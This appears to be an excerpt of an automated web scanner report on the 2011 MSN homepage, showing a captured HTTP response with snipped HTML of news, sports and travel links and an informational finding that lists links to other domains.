http://www.bing.com/travel/content/search?q=Underground+Attractions%3a+Cu+Chi+Tunnels%2c+Vietnam&cid=msntab1173638&FORM=TRVCON
http://www.bing.com/travel/content/search?q=World's+Coolest+Hot+Springs%3a+The+Blue+Lagoon%2c+Iceland&cid=msntab1174865&FORM=TRVCON
http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msn_tab&form=trvcon&gt1=41000
http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do?cid=msn_tab&form=trvcon
http://www.bing.com/travel/deals/last-minute-flight-deals.do?cid=msn_tab&form=trvcon
http://www.bing.com/travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751?&qpvt=hawaii+hotels&cid=msn_tab&form=trvcon
http://www.bing.com/travel/hotels?cid=msn_tab&form=trvcon
http://www.bing.com/travel/hotels?cid=msn_tab&form=trvcon&gt1=41000
http://www.bing.com/videos/watch/video/anthony-hopkins-part-2/17we349d6?q=Anthony+Hopkins&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008
http://www.bing.com/videos/watch/video/baby-shows-his-war-face/20iqdwae?q=Baby+Cry&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007
http://www.bing.com/videos/watch/video/baseball-bride/p67zd1w?q=Chad+Gaudin&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007
http://www.bing.com/videos/watch/video/dana-carvey-part-3/17wmu6ei0?q=Dana+Carvey&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008
http://www.bing.com/videos/watch/video/emotional-race/17w5pcxcn?q=the+bachelor&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008
http://www.bing.com/videos/watch/video/fierce-giraffe-battle-caught-on-video/p40567i?q=Animal+battle&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42006
http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&from=en-us_msnhp
http://www.bing.com/videos/watch/video/untamed-and-uncut-baby-wins-rhino-fight/pexxh15?q=Rhino&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42006
http://www.bing.com/videos/watch/video/wart-hog-warriors/pmxl7g0?q=Animal+Planet&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42006
http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825&feedID=3698&gt1=39002
http://www.foxsportssouthwest.com/msn/01/29/11/Former-Dallas-Cowboy-Herschel-Walker-imp/landing.html?blockID=400443&feedID=3742
http://www.foxsportswest.com/msn/01/28/11/Nothing-Better-than-Lakers-Celtics/landing_moneytalks.html?blockID=399756&feedID=5319
http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers
http://www.theworkbuzz.com/fun-stuff/your-work-soundtrack/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers
https://careers.microsoft.com/
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:49:21 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA25
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 44406
Content-Length: 44406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><body><d
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+30&mkt=en-us&FORM=MSNHPT">Sunday, January 30, 2011</a>
...[SNIP]...
<div><a href="http://msn.foxsports.com/nfl/lists/Top-10-Super-Bowl-Best-Plays?GT1=39002"><img src="http://col.stb.s-msn.com/i/3E/3E32A65A54765E9193E7946B7F64.jpg" title="Image: File photo of Lynn Swann of the Pittsburgh Steelers as he catches a pass during Super Bowl X (.. AP)" width="303" height="211" alt="Image: File photo of Lynn Swann of the Pittsburgh Steelers as he catches a pass during Super Bowl X (.. AP)" /></a>
...[SNIP]...
<span><a href="http://msn.foxsports.com/nfl/lists/Top-10-Super-Bowl-Best-Plays?GT1=39002">The 10 Best Plays in Super Bowl History </a>
...[SNIP]...
<p>Remember Marcus Allen's touchdown run or Lynn Swann's catch? Check out the big game's <a href="http://msn.foxsports.com/nfl/lists/Top-10-Super-Bowl-Best-Plays?GT1=39002">best plays</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl?GT1=39028">Complete Super Bowl coverage </a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy/football/big-game-challenge">Take the Big Game Challenge & beat the experts </a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nfl/gameTrax?gameId=20110130032&GT1=39002">Pro Bowl stars collide today in Honolulu </a>
...[SNIP]...
<a href="http://glo.redacted/beauty/color-combo-6391.gallery?gt1=49036"><img src="http://col.stb.s-msn.com/i/DF/749E3611476657BDEDA1876151B3D.jpg" title="Image: (From left) Demi Moore & Rihanna (.. Gabriel Bouys/AFP/Getty Images; Mark Ralston/AFP/Getty Images)" width="303" height="211" alt="Image: (From left) Demi Moore & Rihanna (.. Gabriel Bouys/AFP/Getty Images; Mark Ralston/AFP/Getty Images)" /></a>
...[SNIP]...
<a href="http://money.msn.com/saving-money/compare-income-debt-savings.aspx?GT1=33021"><img src="http://col.stb.s-msn.com/i/51/E28E2C88338D867AE51A2853768E.jpg" title="Image: Woman looking over fence (.. Charles Gullung/Getty Images)" width="303" height="211" alt="Image: Woman looking over fence (.. Charles Gullung/Getty Images)" /></a>
...[SNIP]...
<a href="http://realestate.redacted/article.aspx?cp-documentid=26648468&GT1=35009"><img src="http://col.stb.s-msn.com/i/D8/6F79BE19ECC2D234C2E9F8B51365.jpg" title=" Image: Women playing pool & darts (.. Louis Turner/Getty Images; Caroline Schiff/Getty Images) " width="303" height="211" alt=" Image: Women playing pool & darts (.. Louis Turner/Getty Images; Caroline Schiff/Getty Images) " /></a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=mom+cave+essentials&form=msnhed&GT1=36010">Bing: Essentials for your mom cave </a>
...[SNIP]...
<span><a href="http://www.bing.com/videos/watch/video/wart-hog-warriors/pmxl7g0?q=Animal+Planet&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42006">Videos: Animals on the Attack </a>
...[SNIP]...
<li style="width:206px;" class="first"><a href="http://www.bing.com/videos/watch/video/wart-hog-warriors/pmxl7g0?q=Animal+Planet&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42006"><img src="http://col.stb.s-msn.com/i/8D/E0998F7A3F51B4EE9CA9E669DD865.jpg" title=" Image: Video still of warring warthogs (.. Animal Planet) " width="206" height="144" alt=" Image: Video still of warring warthogs (.. Animal Planet) " /></a><a href="http://www.bing.com/videos/watch/video/wart-hog-warriors/pmxl7g0?q=Animal+Planet&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42006">Warring warthogs fond of fighting </a>
...[SNIP]...
<li style="width:206px;"><a href="http://www.bing.com/videos/watch/video/untamed-and-uncut-baby-wins-rhino-fight/pexxh15?q=Rhino&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42006"><img src="http://col.stb.s-msn.com/i/66/C6BBA80994D7B938E61E7E4EFDAA5.jpg" title="Image: Video still of baby rhino chasing away aggressive male (.. Animal Planet)" width="206" height="144" alt="Image: Video still of baby rhino chasing away aggressive male (.. Animal Planet)" /></a><a href="http://www.bing.com/videos/watch/video/untamed-and-uncut-baby-wins-rhino-fight/pexxh15?q=Rhino&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42006">Baby rhino races to mom's rescue </a>
...[SNIP]...
<li style="width:206px;" class="last"><a href="http://www.bing.com/videos/watch/video/fierce-giraffe-battle-caught-on-video/p40567i?q=Animal+battle&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42006"><img src="http://col.stb.s-msn.com/i/48/12578C8D1EA6531FBD7D7466FA79C.jpg" title="Image: Video still of fighting male giraffes (.. Animal Planet)" width="206" height="144" alt="Image: Video still of fighting male giraffes (.. Animal Planet)" /></a><a href="http://www.bing.com/videos/watch/video/fierce-giraffe-battle-caught-on-video/p40567i?q=Animal+battle&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42006">Angry giraffes caught necking </a>
...[SNIP]...
<a href="http://www.msnbc.redacted/id/21134540/vp/41326711#41326711?from=en-us_msnhp&gt1=43001"><img class="landscape" src="http://col.stb.s-msn.com/i/9F/2177C83925E3767FB9AC282991F22.jpg" title="Image: Video still of Rebecca Williams (.. NBC)" width="303" height="117" alt="Image: Video still of Rebecca Williams (.. NBC)" /></a>
...[SNIP]...
<li class="ter"><a href="http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825&feedID=3698&gt1=39002">No limits for one-legged wrestler</a>
...[SNIP]...
<li class="ter"><a href="http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never?gt1=43001">Americans cheat on taxes? Never</a>
...[SNIP]...
<div><a href="http://www.bing.com/travel/content/search?q=New+in+Disney+Travel%3a+Alaska+Cruises&cid=msn1176778&FORM=TRVCON&GT1=41000"><img class="landscape" src="http://col.stb.s-msn.com/i/5B/EB40EDC3981E79258ECE32F53B8D76.jpg" title="Image: Woman crossing a bridge on the Wild Africa Trek, Disney's Animal Kingdom, Walt Disney World Resort, Fla. (.. Kent Phillips/Disney)" width="303" height="117" alt="Image: Woman crossing a bridge on the Wild Africa Trek, Disney's Animal Kingdom, Walt Disney World Resort, Fla. (.. Kent Phillips/Disney)" /></a></div><div><a href="http://www.bing.com/travel/content/search?q=New+in+Disney+Travel%3a+Alaska+Cruises&cid=msn1176778&FORM=TRVCON&GT1=41000">Disney's happiest places on Earth </a>
...[SNIP]...
<p>The vacation giant has global tours, cruises & famous parks. Which of these <a href="http://www.bing.com/travel/content/search?q=New+in+Disney+Travel%3a+Alaska+Cruises&cid=msn1176778&FORM=TRVCON&GT1=41000">13 adventures should you take</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/travel/content/search?q=Hotels+With+a+Past%3a+Cadogan+Hotel%2c+London&cid=msn1176921&FORM=TRVCON&gt1=41000"><img class="landscape" src="http://col.stb.s-msn.com/i/BA/C029CA31B84EE7CFCB17C349435C.jpg" title="Image: Cloister of Parador de Santiago de Compostela, Spain (.. Nik Wheeler/Corbis)" width="128" height="73" alt="Image: Cloister of Parador de Santiago de Compostela, Spain (.. Nik Wheeler/Corbis)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/travel/content/search?q=Hotels+With+a+Past%3a+Cadogan+Hotel%2c+London&cid=msn1176921&FORM=TRVCON&gt1=41000"><strong>
...[SNIP]...
<p>If hotels could talk, what stories they could tell. Check out these <a href="http://www.bing.com/travel/content/search?q=Hotels+With+a+Past%3a+Cadogan+Hotel%2c+London&cid=msn1176921&FORM=TRVCON&gt1=41000">12 hotels with a past</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=6+Great+Reasons+to+Visit+New+York+This+Year&cid=msn1177192&form=TRVCON&gt1=41000">6 great reasons to visit New York this year </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Ask+Trip+Coach%3a+Top+Tips+for+Traveling+With+Your+Pet&cid=msn1177190&form=TRVCON&gt1=41000">Tips for traveling with your pet </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msn_tab&form=trvcon&gt1=41000">Leave winter behind: Find great flight deals </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/hotels?cid=msn_tab&form=trvcon&gt1=41000">Find a hotel for your next getaway </a>
...[SNIP]...
<a href="http://glo.redacted/living/superbowl-kids-bash-6426.gallery?gt1=49037"><img class="landscape" src="http://col.stb.s-msn.com/i/6E/A94D44FE6D02377F5C4F609DC03F.jpg" title="Image: Various treats for football party (Courtesy of shindigparties)" width="303" height="117" alt="Image: Various treats for football party (Courtesy of shindigparties)" /></a>
...[SNIP]...
<a href="http://glo.redacted/style/10-winter-style-essentials-6421.gallery?gt1=49006"><img class="landscape" src="http://col.stb.s-msn.com/i/F8/81185586C353EC6EA7CB7985B625C.jpg" title="Image: Bubble jacket & gloves (Courtesy of Ann Taylor; Kohl's)" width="128" height="73" alt="Image: Bubble jacket & gloves (Courtesy of Ann Taylor; Kohl's)" /></a>
...[SNIP]...
<a href="http://glo.redacted/relationships/caroline-rules-1534096.story?gt1=49006"><img class="landscape" src="http://col.stb.s-msn.com/i/80/EA261A55FB948339E67F47051B4F6.jpg" title="Image: Woman looking in mirror (.. Tim Scott/Getty Images)" width="128" height="73" alt="Image: Woman looking in mirror (.. Tim Scott/Getty Images)" /></a>
...[SNIP]...
<div style="float:right;width:116px"><a href="http://msn.foxsports.com/tennis/story/novak-djokovic-beats-andy-murray-wins-second-australian-open-title-013011"><img class="portrait" src="http://static.foxsports.com/content/fscom/img/2011/01/30/djokovic_20110130064153395_116_175.JPG" width="116" height="175" alt="Image: Novak Djokovic (Rob Griffith/AP photo)" /></a></div><div style="margin-right:116px; padding-right: 10px;"><a href="http://msn.foxsports.com/tennis/story/novak-djokovic-beats-andy-murray-wins-second-australian-open-title-013011">Djokovic wins second Aussie Open title</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/golf/leaderboard">Live: Mickelson has win in sight at Torrey Pines</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nba/page/heat-or-threepeat">Will laziness be Lakers' downfall?</a><span class="piped"> | <a href="http://www.foxsportswest.com/msn/01/28/11/Nothing-Better-than-Lakers-Celtics/landing_moneytalks.html?blockID=399756&feedID=5319">Best rivalry is ...</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nfl/story/Porn-Super-Bowl-Green-Bay-Packers-012911">Packer has to choose: Super Bowl or 'Porn Sunday'</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/collegebasketball/scores">It's upset madness in wild day of college hoops</a>
...[SNIP]...
<li class="ter"><a href="http://www.foxsportssouthwest.com/msn/01/29/11/Former-Dallas-Cowboy-Herschel-Walker-imp/landing.html?blockID=400443&feedID=3742">Ex-NFL star continues to find MMA success</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/mlb/story/Martin-Luther-King-III-looking-to-buy-New-York-Mets-012911">Martin Luther King III looking to purchase MLB team</a>
...[SNIP]...
<li class="ter"><a href="http://recruiting.scout.com/2/1043469.html">Sanctions haven't slowed Southern Cal's recruiting</a>
...[SNIP]...
<a href="http://lifestyle.redacted/relationships/staticslideshowglamour.aspx?cp-documentid=27348235&gt1=32092"><img class="landscape" src="http://col.stb.s-msn.com/i/BE/4A28A4A19E915D6BB1CEF2DE2FCC.jpg" title="Image: Couple playing video game (.. Jose Luis Pelaez Inc/Getty Images) " width="303" height="117" alt="Image: Couple playing video game (.. Jose Luis Pelaez Inc/Getty Images) " /></a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/videos/watch/video/baseball-bride/p67zd1w?q=Chad+Gaudin&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007"><img class="landscape" src="http://col.stb.s-msn.com/i/69/3BC6B191E1FEB96B64CBE43BD6C79.jpg" title="Image: Video still of bride Syndal Gorden (.. TLC) " width="128" height="73" alt="Image: Video still of bride Syndal Gorden (.. TLC) " /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/videos/watch/video/baseball-bride/p67zd1w?q=Chad+Gaudin&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007"><strong>
...[SNIP]...
<p><a href="http://www.bing.com/videos/watch/video/baseball-bride/p67zd1w?q=Chad+Gaudin&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007">Dress-shopping</a>
...[SNIP]...
<li class="ter media"><a href="http://www.bing.com/videos/watch/video/emotional-race/17w5pcxcn?q=the+bachelor&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008">Video: Watch a sneak peek of Monday's 'Bachelor' </a>
...[SNIP]...
<li class="ter"><a href="http://msn.chemistry.com/cp/landing/57269?trackingid=516068&bannerid=2117936&gt1=26000">Take a quiz & get matched with someone like you</a>
...[SNIP]...
<div><a href="http://www.bing.com/videos/watch/video/dana-carvey-part-3/17wmu6ei0?q=Dana+Carvey&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008"><img class="landscape" src="http://col.stb.s-msn.com/i/A5/79D26D4C8D9DA16339279967F5473.jpg" title="Image: Video still of Dana Carvey (.. NBC)" width="303" height="117" alt="Image: Video still of Dana Carvey (.. NBC)" /></a></div><div><a href="http://www.bing.com/videos/watch/video/dana-carvey-part-3/17wmu6ei0?q=Dana+Carvey&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008">Carvey lobbied for Schwarzenegger</a>
...[SNIP]...
<p>Video: The comedian <a href="http://www.bing.com/videos/watch/video/dana-carvey-part-3/17wmu6ei0?q=Dana+Carvey&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008">recalls his campaigning days</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/videos/watch/video/anthony-hopkins-part-2/17we349d6?q=Anthony+Hopkins&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008"><img class="landscape" src="http://col.stb.s-msn.com/i/90/FB7888CDDECEAEF33752C48C04286.jpg" title="Image: Video still of Anthony Hopkins (.. ABC)" width="128" height="73" alt="Image: Video still of Anthony Hopkins (.. ABC)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/videos/watch/video/anthony-hopkins-part-2/17we349d6?q=Anthony+Hopkins&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008"><strong>
...[SNIP]...
<p>The actor tells Kimmel of his friendship with <a href="http://www.bing.com/videos/watch/video/anthony-hopkins-part-2/17we349d6?q=Anthony+Hopkins&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008">Randy Jackson.</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/videos/watch/video/baby-shows-his-war-face/20iqdwae?q=Baby+Cry&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007"><img class="landscape" src="http://col.stb.s-msn.com/i/CD/70685892D9EC978E450FF891858.jpg" title="Image: Video still of baby screaming (.. StupidVideos)" width="128" height="73" alt="Image: Video still of baby screaming (.. StupidVideos)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/videos/watch/video/baby-shows-his-war-face/20iqdwae?q=Baby+Cry&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007"><strong>
...[SNIP]...
<p>Video: <a href="http://www.bing.com/videos/watch/video/baby-shows-his-war-face/20iqdwae?q=Baby+Cry&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007">Game on</a>
...[SNIP]...
<div style="float:left;width:128px"><a href="http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&from=en-us_msnhp"><img class="landscape" src="http://col.stb.s-msn.com/i/FB/39B57119E113EAC72C86F212549.jpg" title="Image: 'Rio' (.. 20th Century Fox)" width="128" height="73" alt="Image: 'Rio' (.. 20th Century Fox)" /></a></div><div style="margin-left:128px; padding-left: 10px"><a href="http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&from=en-us_msnhp"><strong>
...[SNIP]...
<div style="float:left;width:128px"><a href="http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers"><img class="landscape" src="http://col.stb.s-msn.com/i/A6/6401E4B948C6DA838C385E3FAD9FC.jpg" title="Image: Businesswoman on computer screen (.. Bernhard Lang/Getty Images)" width="128" height="73" alt="Image: Businesswoman on computer screen (.. Bernhard Lang/Getty Images)" /></a></div><div style="margin-left:128px; padding-left: 10px"><a href="http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers"><strong>
...[SNIP]...
<p>How <a href="http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers">video is replacing</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/?SiteId=cbmsnjm41951&sc_extcmp=JS_1951_jobmod">Get paid to socially network</a>
...[SNIP]...
<li class="ter"><a href="http://www.theworkbuzz.com/fun-stuff/your-work-soundtrack/#more-6495/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers">Your work soundtrack</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/?SiteId=cbmsnjm41302&sc_extcmp=JS_1302_jobmod">Excuse-free time off</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/?SiteId=cbmsnjm41391&sc_extcmp=JS_1391_jobmod">9 questions you should ask your boss</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/?SiteId=cbmsnjm42469&sc_extcmp=JS_2469_jobmod">Job advice that was true 20 years ago</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=job+interview+makeup&form=ap&gt1=36010">Bing: Got an interview? Get makeup tips</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+live+on+a+tight+budget&form=ap&gt1=36010">Search: How to live on a tight budget</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+get+the+job+of+your+dreams&form=ap&gt1=36010">Find: How to get your dream job</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&cid=msn1162079&FORM=TRVCON"><img class="landscape" src="http://col.stb.s-msn.com/i/A8/EAAC5AEEA4675FAFFCE4F81A2F97C.jpg" title="Image: Boats in harbor, Bandon, Ore. (Courtesy Wood Sabolt)" width="128" height="73" alt="Image: Boats in harbor, Bandon, Ore. (Courtesy Wood Sabolt)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&cid=msn1162079&FORM=TRVCON"><strong>
...[SNIP]...
<p>Bigger isn't always better in these <a href="http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&cid=msn1162079&FORM=TRVCON">fun, hip burgs</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Hawaiian+Islands%3a+Best+for+Gorgeous+Beaches&cid=msntab1162226&FORM=TRVCON">Which Hawaiian Island is right for you?</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=World's+Coolest+Hot+Springs%3a+The+Blue+Lagoon%2c+Iceland&cid=msntab1174865&FORM=TRVCON">Coolest hot springs around the globe</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Underground+Attractions%3a+Cu+Chi+Tunnels%2c+Vietnam&cid=msntab1173638&FORM=TRVCON">15 unusual underground attractions</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=37+Secrets+of+the+Caribbean&cid=msntab1172106&Form=TRVCON">37 steals & deals for the Caribbean</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do?cid=msn_tab&form=trvcon">Cheap flights to the Caribbean</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751?&qpvt=hawaii+hotels&cid=msn_tab&form=trvcon">Hotel deals in Honolulu</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/last-minute-flight-deals.do?cid=msn_tab&form=trvcon">Last-minute flights on the cheap</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/hotels?cid=msn_tab&form=trvcon">Find the perfect hotel</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/maps/explore/?org=aj&FORM=Z9LH9#">Bing Maps: Where do you want to go next?</a>
...[SNIP]...
<a href="http://appetiteforlife.redacted/?section=episodes&content=2&source=msn&from=en-us_msnhp&GT1=25052"><img src="http://col.stb.s-msn.com/i/69/38A7E111C7E3A98263F6658E7063D2.jpg" title="Image: Video still of Andrew Zimmern (.. Reveille/Microsoft)" width="75" height="128" alt="Image: Video still of Andrew Zimmern (.. Reveille/Microsoft)" /></a>
...[SNIP]...
<a href="http://g.redacted/AIPRIV/en-us" class="adch"><img src="http://col.stc.s-msn.com/br/sc/i/icons/adchoices_gif.gif" alt="Ad Choice" title="Ad Choice" height="12" width="68" /></a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/home/home">Advertise</a>
...[SNIP]...
<li><a href="https://careers.microsoft.com/">Jobs</a>
...[SNIP]...
<li><a class="opennew" href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...

22.432. http://www.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redacted
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.redacted/?euid=AD04D6F8B2FF44629973BD0674351135&userGroup=D1:default&PM=z:1

The response contains the following links to other domains:

http://advertising.microsoft.com/home/home
http://col.stb.s-redacted/i/39/C546EB3FB328CFCBC2B134AE608F13.jpg
http://col.stb.s-redacted/i/3E/3E32A65A54765E9193E7946B7F64.jpg
http://col.stb.s-redacted/i/51/E28E2C88338D867AE51A2853768E.jpg
http://col.stb.s-redacted/i/5B/EB40EDC3981E79258ECE32F53B8D76.jpg
http://col.stb.s-redacted/i/69/38A7E111C7E3A98263F6658E7063D2.jpg
http://col.stb.s-redacted/i/69/3BC6B191E1FEB96B64CBE43BD6C79.jpg
http://col.stb.s-redacted/i/6E/A94D44FE6D02377F5C4F609DC03F.jpg
http://col.stb.s-redacted/i/80/EA261A55FB948339E67F47051B4F6.jpg
http://col.stb.s-redacted/i/90/FB7888CDDECEAEF33752C48C04286.jpg
http://col.stb.s-redacted/i/A4/F0AD2AF1A47A5678C912AF71106548.jpg
http://col.stb.s-redacted/i/A5/79D26D4C8D9DA16339279967F5473.jpg
http://col.stb.s-redacted/i/A6/6401E4B948C6DA838C385E3FAD9FC.jpg
http://col.stb.s-redacted/i/A8/EAAC5AEEA4675FAFFCE4F81A2F97C.jpg
http://col.stb.s-redacted/i/BA/C029CA31B84EE7CFCB17C349435C.jpg
http://col.stb.s-redacted/i/BE/4A28A4A19E915D6BB1CEF2DE2FCC.jpg
http://col.stb.s-redacted/i/CD/70685892D9EC978E450FF891858.jpg
http://col.stb.s-redacted/i/D8/6F79BE19ECC2D234C2E9F8B51365.jpg
http://col.stb.s-redacted/i/DF/749E3611476657BDEDA1876151B3D.jpg
http://col.stb.s-redacted/i/F8/81185586C353EC6EA7CB7985B625C.jpg
http://col.stb.s-redacted/i/FB/39B57119E113EAC72C86F212549.jpg
http://col.stc.s-redacted/br/sc/i/icons/adchoices_gif.gif
http://go.microsoft.com/fwlink/?LinkId=74170
http://msn.careerbuilder.com/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/?SiteId=cbmsnjm41302&sc_extcmp=JS_1302_jobmod
http://msn.careerbuilder.com/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/?SiteId=cbmsnjm41391&sc_extcmp=JS_1391_jobmod
http://msn.careerbuilder.com/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/?SiteId=cbmsnjm41951&sc_extcmp=JS_1951_jobmod
http://msn.careerbuilder.com/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/?SiteId=cbmsnjm42469&sc_extcmp=JS_2469_jobmod
http://msn.chemistry.com/cp/landing/57269?trackingid=516068&bannerid=2117936&gt1=26000
http://msn.foxsports.com/fantasy/football/big-game-challenge
http://msn.foxsports.com/golf/leaderboard
http://msn.foxsports.com/nascar/story/Patrick-Dempsey-24-Hours-of-Daytona-Juan-Pablo-Montoya-013011
http://msn.foxsports.com/nba/story/Josh-Smith-Atlanta-Hawks-fine-for-obscene-gesture-013011
http://msn.foxsports.com/nfl/gameTrax?gameId=20110130032&GT1=39002
http://msn.foxsports.com/nfl/lists/Top-10-Super-Bowl-Best-Plays?GT1=39002
http://msn.foxsports.com/nfl/story/Porn-Super-Bowl-Green-Bay-Packers-012911
http://msn.foxsports.com/nfl/story/Pro-Bowl-has-plenty-going-for-it-012711
http://msn.foxsports.com/nfl/story/nfl-mock-draft-post-senior-bowl-012911
http://msn.foxsports.com/nfl?GT1=39028
http://msn.foxsports.com/tennis/story/refocused-novak-djokovic-dominates-at-australian-open-013011
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
